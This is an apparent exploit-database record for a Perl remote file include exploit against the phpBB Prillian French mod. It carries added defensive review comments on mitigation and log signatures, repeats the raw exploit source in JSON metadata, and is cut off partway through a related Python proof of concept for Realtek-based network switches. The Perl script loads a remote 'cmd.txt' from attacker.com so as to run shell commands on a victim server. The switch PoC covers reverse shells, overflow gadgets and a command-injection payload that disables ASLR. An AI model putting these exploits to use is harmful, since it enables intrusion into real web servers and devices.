phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit
2006-10-13T00:00:00
ID 1337DAY-ID-987 Type zdt Reporter Nima Salehi Modified 2006-10-13T00:00:00
Description
Exploit for unknown platform in category web applications
==============================================================
phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit
==============================================================
#!/usr/bin/perl
#####################################################################################################
# #
# PhpBB Prillian French #
# #
# Class: Remote File Include Vulnerability #
# #
# Patch: unavailable #
# #
# Date: 2006/10/12 #
# #
# Remote: Yes #
# #
# Type: high #
# #
#####################################################################################################
#
# Review notes (defender perspective)
#
# What this script is: an interactive proof-of-concept for a remote file
# inclusion (RFI) weakness in the phpBB "Prillian French" language mod
# (title: <= 0.8.0; the header above lists no patch). Every line typed at the
# prompt becomes one HTTP GET whose `phpbb_root_path` query parameter points
# at an attacker-controlled URL ($cmdshell), so the vulnerable PHP file ends
# up including remote content instead of a local path.
#
# Mitigation (application/PHP side): never derive include()/require() paths
# from request data; in php.ini keep `allow_url_include=Off` (and where
# possible `allow_url_fopen=Off`), which removes the remote-code path for
# this whole bug class even when the application check is missing.
#
# Detection: requests for `lang_prillian_faq.php` whose query string carries
# `phpbb_root_path=` followed by a URL scheme (`http://`, `https://`, `ftp://`)
# are the signature to alert on in web-server / WAF logs; an outbound HTTP
# fetch from the web server to an unfamiliar host right after such a request
# indicates the inclusion was attempted server-side.
#
# Code quality as published: no `use strict; use warnings;`, package globals
# throughout, `LWP::Simple` is loaded but never referenced, and the `$vul`
# assignment below has no terminating semicolon, so perl rejects this file at
# compile time as-is.
#
use IO::Socket;
use LWP::Simple;   # loaded but never used
# URL of the remote file the target is induced to include; the PHP returned
# from this URL is what would actually execute on the target.
$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script
print "\n";
print "##########################################################################\n";
print "# #\n";
print "# PhpBB Prillian French Remote File Include Vulnerability #\n";
print "# Bug found By : Ashiyane Corporation #\n";
print "# Web Site : www.Ashiyane.ir #\n";
print "# #\n";
print "##########################################################################\n";
# Two positional arguments: target host and the forum's base path.
if (@ARGV < 2)
{
print "\n Usage: Ashiyane.pl [host] [path] ";
print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
# Vulnerable script plus the injectable parameter. NOTE: this statement is
# missing its trailing semicolon in the published source (compile error).
$vul="/language/lang_french/lang_prillian_faq.php?phpbb_root_path="
print "Type Your Commands ( uname -a )\n";
print "For Exiit Type END\n";
# First command is read before the loop; later ones at the bottom of the loop.
print "<Shell> ";$cmd = <STDIN>;
# "END" is used as a regex, not an equality test: any input containing the
# substring END (e.g. "SEND") terminates the loop.
while($cmd !~ "END") {
# One fresh plaintext TCP connection per command (see "Connection: close").
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
# Request line: <path><vul><remote URL>?cmd=<command>?  -- $cmd is never
# chomped, so the newline read from STDIN is sent inside the request line.
print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
# Header block is terminated with "\r\n\n" as written here.
print $socket "Connection: close\r\n\n";
# Echo the raw HTTP response (status line, headers and body) to the terminal.
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "<Shell> ";
$cmd = <STDIN>;
}
# 0day.today [2018-01-05] #
{"hash": "970de682cdbccf2523d7f0fd67d1ebe2001d03d5df6e988d2e757c76be39d75e", "id": "1337DAY-ID-987", "lastseen": "2018-01-05T21:13:26", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bad878ce92546233e9e69c63cfbbbf2a", "key": "href"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "modified"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0b711bb3a86d234678ca90bbe6d736ed", "key": "reporter"}, {"hash": "17dd966075384205a2490a701a40e098", "key": "sourceData"}, {"hash": "77124d089275a30d7925f456f636515e", "key": "sourceHref"}, {"hash": "02136e3d2223f73a254d8c851d44a162", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -1.1, "vector": "NONE", "modified": "2018-01-05T21:13:26"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32411", "1337DAY-ID-31805", "1337DAY-ID-30759", "1337DAY-ID-27921", "1337DAY-ID-27006", "1337DAY-ID-25853", "1337DAY-ID-24685", "1337DAY-ID-21146", "1337DAY-ID-20733", "1337DAY-ID-20185"]}, {"type": "exploitdb", "idList": ["EDB-ID:42148", "EDB-ID:27778"]}, {"type": "hackerone", "idList": ["H1:212696"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201612-37.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201612-37"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134710", "PACKETSTORM:134090"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/APACHE_MOD_CGI_BASH_ENV_EXEC", "MSF:EXPLOIT/MULTI/HTTP/AUXILIUM_UPLOAD_EXEC"]}, {"type": "seebug", "idList": ["SSV:81370"]}], "modified": "2018-01-05T21:13:26"}, "vulnersScore": 
-1.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/987", "description": "Exploit for unknown platform in category web applications", "title": "phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit", "history": [{"bulletin": {"hash": "67a85435e61fd0a8a5d30ad89b5a2bd432e957b058177134213fbf43acf41238", "id": "1337DAY-ID-987", "lastseen": "2016-04-19T23:54:42", "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T23:54:42"}}, "hashmap": [{"hash": "f4e76978ed72892b54436fb236eb8399", "key": "href"}, {"hash": "0b711bb3a86d234678ca90bbe6d736ed", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "02136e3d2223f73a254d8c851d44a162", "key": "title"}, {"hash": "6576fb92b14f01adca9718a51a9fcc8d", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "modified"}, {"hash": "57b4f4dca3d4dc1768d212bbee24699d", "key": "published"}, {"hash": "c80b6373278302c0642ea902eb9827e4", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/987", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==============================================================\r\nphpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n 
\r\n#####################################################################################################\r\n# #\r\n# PhpBB Prillian French #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Patch: unavailable #\r\n# #\r\n# Date: 2006/10/12 #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n#####################################################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"##########################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# PhpBB Prillian French Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\r\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\r\nprint \"# #\\n\";\r\nprint \"##########################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\r\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$vul=\"/language/lang_french/lang_prillian_faq.php?phpbb_root_path=\"\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? 
HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-10-13T00:00:00", "references": [], "reporter": "Nima Salehi", "modified": "2006-10-13T00:00:00", "href": "http://0day.today/exploit/description/987"}, "lastseen": "2016-04-19T23:54:42", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==============================================================\r\nphpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n \r\n#####################################################################################################\r\n# #\r\n# PhpBB Prillian French #\r\n# #\r\n# Class: Remote File Include Vulnerability #\r\n# #\r\n# Patch: unavailable #\r\n# #\r\n# Date: 2006/10/12 #\r\n# #\r\n# Remote: Yes #\r\n# #\r\n# Type: high #\r\n# #\r\n#####################################################################################################\r\n\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\r\n\r\nprint \"\\n\";\r\nprint \"##########################################################################\\n\";\r\nprint \"# #\\n\";\r\nprint \"# PhpBB Prillian French Remote File Include Vulnerability #\\n\";\r\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\r\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\r\nprint \"# #\\n\";\r\nprint \"##########################################################################\\n\";\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\r\n print \"\\n EX : 
Ashiyane.pl www.victim.com /path/ \\n\\n\";\r\nexit;\r\n}\r\n\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$vul=\"/language/lang_french/lang_prillian_faq.php?phpbb_root_path=\"\r\n\r\nprint \"Type Your Commands ( uname -a )\\n\";\r\nprint \"For Exiit Type END\\n\";\r\n\r\nprint \"<Shell> \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"<Shell> \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2006-10-13T00:00:00", "references": [], "reporter": "Nima Salehi", "modified": "2006-10-13T00:00:00", "href": "https://0day.today/exploit/description/987"}
{"zdt": [{"lastseen": "2019-12-04T20:00:01", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2019-10-01T00:00:00", "published": "2019-10-01T00:00:00", "id": "1337DAY-ID-33299", "href": "https://0day.today/exploit/description/33299", "title": "Cisco Small Business 220 Series - Multiple Vulnerabilities", "type": "zdt", "sourceData": "#!/usr/bin/python2.7\r\n#\r\n\"\"\"\r\n\r\n[Subject]\r\n\r\nRealtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)\r\nhttps://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller\r\n\r\n[Brief description]\r\n\r\n1.\tBoa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)\r\n\tNote: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding\r\n2.\tReuse of code between vendors gives almost indentical exploitation of found vulnerabilities\r\n3.\tTwo strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian\r\n\r\n[Goals for this PoC]\r\n\r\n1.\tOne Python PoC for all vendors\r\n\tUsing dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.\r\n\tThe python code will read and use details from dictionary when verifying/exploiting\r\n\r\n2.\tUniquely identify remote target\r\n\tETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware\r\n\r\n\tETag: xxxxx-yyyyy\r\n\txxxxx = file size (up to 5 digits)\r\n\tyyyyy = last modified (up to 5 digits)\r\n\r\n3.\tReverse shell\r\n\tMIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. 
etc' availible\r\n\r\n4.\tadd/delete credentials for GUI/CLI\r\n\tQuite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'\r\n\tFor those who has added protection, we can add/delete credentials with an bit interesting jumping sequence\r\n\r\n[Technical brief]\r\n1.\tStack - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)\r\n2.\tHeap - Read/Write/Executable (No need to turn off, ASLR not turned on for heap)\r\n3.\tfork - Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell\r\n\r\nTwo vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,\r\nthis allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request\r\n\r\n[Basically]\r\nFirst buffer: [aaaaaaaa][0x58xxxxxx]\t('a' and 0x58 will be overwritten by second buffer)\r\nSecond buffer: [bbbbb][bbbbbbbb][0x00xxxxxx]\t(NULL termination will overwrite 0x58)\r\n\r\n[Known targets]\r\n\r\nAll below is fully exploitable, with following exception:\r\n[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]\r\n[*] ETag: 639-73124 [NETGEAR Inc. 
GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]\r\n\r\nNot because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,\r\nand 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.\r\n[They are still fully exploitable with the Boa/Hydra vulnerability]\r\n\r\nNote:\r\nIn this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.\r\n\r\n\r\n$ ./Realtek-RTL83xx-PoC.py --etag help\r\n\r\n[*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)\r\n[*] RHOST: 192.168.57.20\r\n[*] RPORT: 80\r\n[*] LHOST: 192.168.57.1\r\n[*] LPORT: 1337\r\n[+] Target: List of known targets\r\n\r\n[*] ETag: 225-51973 [Cisco Systems, Inc. Sx220 v1.1.3.1]\r\n[*] ETag: 225-60080 [Cisco Systems, Inc. Sx220 v1.1.4.1]\r\n[*] ETag: 752-76347 [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]\r\n[*] ETag: 225-21785 [Pakedgedevice & Software Inc SX-8P v1.04]\r\n[*] ETag: 222-71560 [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]\r\n[*] ETag: 14044-509 [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]\r\n[*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]\r\n[*] ETag: 218-22429 [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]\r\n[*] ETag: 218-7473 [PLANET Technology Corp. GS-4210-24T2S v2.0b160727]\r\n[*] ETag: 752-95168 [DrayTek Corp. VigorSwitch P1100 v2.1.4]\r\n[*] ETag: 225-96283 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]\r\n[*] ETag: 225-63242 [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]\r\n[*] ETag: 224-5061 [CERIO Corp. CS-2424G-24P v1.00.29]\r\n[*] ETag: 222-50100 [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]\r\n[*] ETag: 222-81176 [Shenzhen TG-NET Botone Technology Co,. Ltd. 
P3026M-24POE (V3) v3.1.1-R1]\r\n[*] ETag: 8028-89928 [Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]\r\n[*] ETag: 222-64895 [Xhome DownLoop-G24M v3.0.0.43126]\r\n[*] ETag: 222-40570 [Realtek RTL8380-24GE-4GEC v3.0.0.43126]\r\n[*] ETag: 222-45866 [Abaniact AML2-PS16-17GP L2 v116B00033]\r\n[*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]\r\n[*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]\r\n[*] ETag: 609-31457 [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]\r\n[*] ETag: 639-98866 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]\r\n[*] ETag: 639-73124 [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]\r\n\r\n\r\n[*] All done...\r\n\r\n[Other vendors]\r\nThese names have been found within some Firmware images, but not implemented as I have not found any Firmware images.\r\n(However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')\r\n\r\n[*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power\r\n\r\n[Known bugs]\r\n1.\tNon-JSON:\r\n\t'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'\r\n\t(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)\r\n\r\n[Responsible Disclosure]\r\nWorking with VDOO since early February 2019 to disclosure found vulnerabilities to vendors\r\nhttps://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches\r\n\r\n\r\n[Technical details]\r\nPlease read the code\r\n\r\n\"\"\"\r\n# Have a nice day\r\n# /bashis\r\n#\r\n\r\nimport string\r\nimport sys\r\nimport socket\r\nimport argparse\r\nimport urllib, urllib2, httplib\r\nimport base64\r\nimport ssl\r\nimport hashlib\r\nimport re\r\nimport struct\r\nimport time\r\nimport thread\r\nimport json\r\nimport inspect\r\nimport copy\r\n\r\nimport hashlib\r\nfrom 
Crypto.Cipher import AES\r\nfrom Crypto.Cipher import PKCS1_v1_5\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto import Random\r\nfrom random import randint\r\n\r\nfrom pwn import * # pip install pwn\r\n\r\nglobal debug\r\ndebug = False\r\nglobal force\r\nforce = False\r\n\r\ndef DEBUG(direction, text):\r\n\tif debug:\r\n\t\t# Print send/recv data and current line number\r\n\t\tprint \"[BEGIN {}] <{:-^60}>\".format(direction, inspect.currentframe().f_back.f_lineno)\r\n\t\tprint \"\\n{}\\n\".format(text)\r\n\t\tprint \"[ END {}] <{:-^60}>\".format(direction, inspect.currentframe().f_back.f_lineno)\r\n\treturn\r\n\r\nclass HTTPconnect:\r\n\r\n\tdef __init__(self, host, proto, verbose, creds, Raw):\r\n\t\tself.host = host\r\n\t\tself.proto = proto\r\n\t\tself.verbose = verbose\r\n\t\tself.credentials = creds\r\n\t\tself.Raw = Raw\r\n\t\r\n\tdef Send(self, uri, query_headers, query_data,ID,encode_query):\r\n\t\tself.uri = uri\r\n\t\tself.query_headers = query_headers\r\n\t\tself.query_data = query_data\r\n\t\tself.ID = ID\r\n\t\tself.encode_query = encode_query\r\n\r\n\t\t# Connect-timeout in seconds\r\n\t\t#timeout = 5\r\n\t\t#socket.setdefaulttimeout(timeout)\r\n\r\n\t\turl = '{}://{}{}'.format(self.proto, self.host, self.uri)\r\n\r\n\t\tif self.verbose:\r\n\t\t\tlog.info(\"[Verbose] Sending: {}\".format(url))\r\n\r\n\t\tif self.proto == 'https':\r\n\t\t\tif hasattr(ssl, '_create_unverified_context'):\r\n\t\t\t\t#log.info(\"Creating SSL Unverified Context\")\r\n\t\t\t\tssl._create_default_https_context = ssl._create_unverified_context\r\n\r\n\t\tif self.credentials:\r\n\t\t\tBasic_Auth = self.credentials.split(':')\r\n\t\t\tif self.verbose:\r\n\t\t\t\tlog.info(\"[Verbose] User: {}, Password: {}\".format(Basic_Auth[0],Basic_Auth[1]))\r\n\t\t\ttry:\r\n\t\t\t\tpwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\n\t\t\t\tpwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])\r\n\t\t\t\tauth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)\r\n\t\t\t\topener = 
urllib2.build_opener(auth_handler)\r\n\t\t\t\turllib2.install_opener(opener)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tlog.info(\"Basic Auth Error: {}\".format(e))\r\n\t\t\t\tsys.exit(1)\r\n\r\n\t\tif self.query_data:\r\n\t\t\t#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)\r\n\t\t\tif self.query_data and self.encode_query:\r\n\t\t\t\trequest = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)\r\n\t\t\telse:\r\n\t\t\t\trequest = urllib2.Request(url, data=self.query_data, headers=self.query_headers)\r\n\r\n\t\t\tif self.ID:\r\n\t\t\t\trequest.add_header('Cookie', self.ID)\r\n\t\telse:\r\n\t\t\trequest = urllib2.Request(url, None, headers=self.query_headers)\r\n\t\t\tif self.ID:\r\n\t\t\t\trequest.add_header('Cookie', self.ID)\r\n\t\tresponse = urllib2.urlopen(request)\r\n\t\t#if response:\r\n\t\t#\tprint \"[<] {} OK\".format(response.code)\r\n\r\n\t\tif self.Raw:\r\n\t\t\treturn response\r\n\t\telse:\r\n\t\t\thtml = response.read()\r\n\t\t\treturn html\r\n\r\n#\r\n# Validate correctness of HOST, IP and PORT\r\n#\r\nclass Validate:\r\n\r\n\tdef __init__(self,verbose):\r\n\t\tself.verbose = verbose\r\n\r\n\t# Check if IP is valid\r\n\tdef CheckIP(self,IP):\r\n\t\tself.IP = IP\r\n\r\n\t\tip = self.IP.split('.')\r\n\t\tif len(ip) != 4:\r\n\t\t\treturn False\r\n\t\tfor tmp in ip:\r\n\t\t\tif not tmp.isdigit():\r\n\t\t\t\treturn False\r\n\t\ti = int(tmp)\r\n\t\tif i < 0 or i > 255:\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\t# Check if PORT is valid\r\n\tdef Port(self,PORT):\r\n\t\tself.PORT = PORT\r\n\r\n\t\tif int(self.PORT) < 1 or int(self.PORT) > 65535:\r\n\t\t\treturn False\r\n\t\telse:\r\n\t\t\treturn True\r\n\r\n\t# Check if HOST is valid\r\n\tdef Host(self,HOST):\r\n\t\tself.HOST = HOST\r\n\r\n\t\ttry:\r\n\t\t\t# Check valid IP\r\n\t\t\tsocket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP\r\n\t\t\t# Now we check if it is correct 
typed IP\r\n\t\t\tif self.CheckIP(self.HOST):\r\n\t\t\t\treturn self.HOST\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\t\texcept socket.error as e:\r\n\t\t\t# Else check valid FQDN name, and use the IP address\r\n\t\t\ttry:\r\n\t\t\t\tself.HOST = socket.gethostbyname(self.HOST)\r\n\t\t\t\treturn self.HOST\r\n\t\t\texcept socket.error as e:\r\n\t\t\t\treturn False\r\n\r\nclass Vendor:\r\n\r\n\tdef __init__(self, ETag):\r\n\t\tself.ETag = ETag\r\n\r\n\tdef random_string(self,length):\r\n\t\tself.length = length\r\n\r\n\t\treturn \"a\" * self.length\r\n\t\t#return ''.join(random.choice(string.lowercase) for i in range(self.length))\r\n\r\n\t#\r\n\t# Source: https://gist.github.com/angstwad/bf22d1822c38a92ec0a9\r\n\t#\r\n\tdef dict_merge(self, dct, merge_dct):\r\n\t\t\"\"\" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of\r\n\t\tupdating only top-level keys, dict_merge recurses down into dicts nested\r\n\t\tto an arbitrary depth, updating keys. The ``merge_dct`` is merged into\r\n\t\t``dct``.\r\n\t\t:param dct: dict onto which the merge is executed\r\n\t\t:param merge_dct: dct merged into dct\r\n\t\t:return: None\r\n\t\t\"\"\"\r\n\t\tfor k, v in merge_dct.iteritems():\r\n\t\t\tif (k in dct and isinstance(dct[k], dict)\r\n\t\t\t\t\tand isinstance(merge_dct[k], collections.Mapping)):\r\n\t\t\t\tself.dict_merge(dct[k], merge_dct[k])\r\n\t\t\telse:\r\n\t\t\t\tdct[k] = merge_dct[k]\r\n\r\n\r\n\t#\r\n\t# Difference between vendors and Firmware versions.\r\n\t# The update code will search below and update the template on the fly\r\n\t# (you can tweak and add code in the template from here)\r\n\t#\r\n\t# ETag - excellent tool for determine the target\r\n\t#\r\n\t# ETag: xxxxx-yyyyy\r\n\t# xxxxx = file size (up to 5 digits)\r\n\t# yyyyy = last modified (up to 5 digits)\r\n\t#\r\n\tdef dict(self):\r\n\r\n\t\tVendor_ETag = {\r\n\t\t\t#\r\n\t\t\t# PLANET Technology Corp.\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: 
Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'218-22429': {\r\n\t\t\t\t'template':'Planet',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.0b171116',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'GS-4210-8P2S',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.planet.com.tw/en/product/GS-4210-8P2S',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E04C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484029c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x423B9C,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > 
